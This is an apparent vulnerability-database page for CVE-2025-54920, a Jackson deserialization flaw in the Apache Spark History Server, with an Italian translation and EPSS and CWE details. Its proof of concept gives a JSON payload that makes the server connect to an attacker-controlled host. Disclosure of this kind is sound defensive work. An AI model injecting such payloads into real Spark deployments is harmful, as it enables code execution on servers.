CVE-2025-54920

Published: Mar 16, 2026 Last Modified: Mar 17, 2026

ExploitDB:

Other exploit source:

Google Dorks:

HIGH 8,8

Source: 134c704f-9b21-4f2e-91b3-4a467353bcc0

Attack Vector: network

Attack Complexity: low

Privileges Required: low

User Interaction: none

Scope: unchanged

Confidentiality: high

Integrity: high

Availability: high

Description

AI Translation Available

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

{

'Event': 'org.apache.hive.jdbc.HiveConnection',
'uri': 'jdbc:hive2://<IP>:<PORT>/',
'info': {
'hive.metastore.uris': 'thrift://<IP>:<PORT>'
}
}

3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

AI Generated Translation

Questo problema riguarda Apache Spark: versioni precedenti alla 3.5.7 e 4.0.1. Si consiglia agli utenti di aggiornare alla versione 3.5.7 o 4.0.1 e successive, che risolvono la vulnerabilità.

**Sommario**

Apache Spark 3.5.4 e versioni precedenti contengono una vulnerabilità di esecuzione di codice nel Spark History Web UI a causa di una deserializzazione Jackson troppo permissiva dei dati di log degli eventi. Questo permette a un attaccante con accesso alla directory dei log degli eventi di Spark di iniettare payload JSON dannosi che attivano la deserializzazione di classi arbitrarie, consentendo l'esecuzione di comandi sul sistema host che esegue il Spark History Server.

**Dettagli**

La vulnerabilità nasce dal fatto che il Spark History Server utilizza la deserializzazione polimorfica Jackson con @JsonTypeInfo.Id.CLASS sugli oggetti SparkListenerEvent, permettendo a un attaccante di specificare nomi di classi arbitrari nel JSON degli eventi. Questo comportamento consente di istanziare classi non previste, come org.apache.hive.jdbc.HiveConnection, che possono effettuare chiamate di rete o altre azioni dannose durante la deserializzazione.

L’attaccante può sfruttare questa vulnerabilità iniettando contenuti JSON manipolati nei file di log degli eventi di Spark, che il History Server deserializza all’avvio o durante il caricamento dei log. Ad esempio, può costringere il History Server ad aprire una connessione JDBC a un server controllato dall’attaccante, dimostrando la capacità di esecuzione di comandi remoti.

**Prova di concetto:**

1. Eseguire Spark con il logging degli eventi abilitato, scrivendo in una directory scrivibile (spark-logs).

2. Iniettare il seguente JSON all’inizio di un file di log degli eventi:

```json
{
"Event": "org.apache.hive.jdbc.HiveConnection",
"uri": "jdbc:hive2://<IP>:<PORT>/",
"info": {
"hive.metastore.uris": "thrift://<IP>:<PORT>"
}
}
```

3. Avviare il Spark History Server puntando i log alla directory modificata.

4. Il Spark History Server stabilisce una connessione JDBC al server dell’attaccante, confermando l’iniezione.

**Impatto**

Un attaccante con accesso in scrittura ai log degli eventi di Spark può eseguire codice arbitrario sul server che esegue il History Server, compromettendo potenzialmente l’intero sistema.

EPSS (Exploit Prediction Scoring System)

Trend Analysis

EPSS (Exploit Prediction Scoring System)

Prevede la probabilità di sfruttamento basata su intelligence sulle minacce e sulle caratteristiche della vulnerabilità.

EPSS Score

0,0017

Percentile

0,4th

Updated

EPSS Score Trend (Last 4 Days)

502

Deserialization of Untrusted Data

Draft

Abstraction: Base Structure: Simple

Common Consequences

Security Scopes Affected:

Integrity Availability Other

Potential Impacts:

Modify Application Data Unexpected State Dos: Resource Consumption (Cpu) Varies By Context

Applicable Platforms

Languages: Java, JavaScript, PHP, Python, Ruby

Technologies: AI/ML, ICS/OT, Not Technology-Specific

Likelihood of Exploit: Medium

View CWE Details

http://www.openwall.com/lists/oss-security/2026/03/13/4

https://github.com/apache/spark/pull/51312

https://github.com/apache/spark/pull/51323

https://issues.apache.org/jira/browse/SPARK-52381

https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1…

https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s

CVE-2025-54920

Description

EPSS (Exploit Prediction Scoring System)

EPSS (Exploit Prediction Scoring System)

EPSS Score Trend (Last 4 Days)

Deserialization of Untrusted Data

Common Consequences

Applicable Platforms

Iscriviti alla newsletter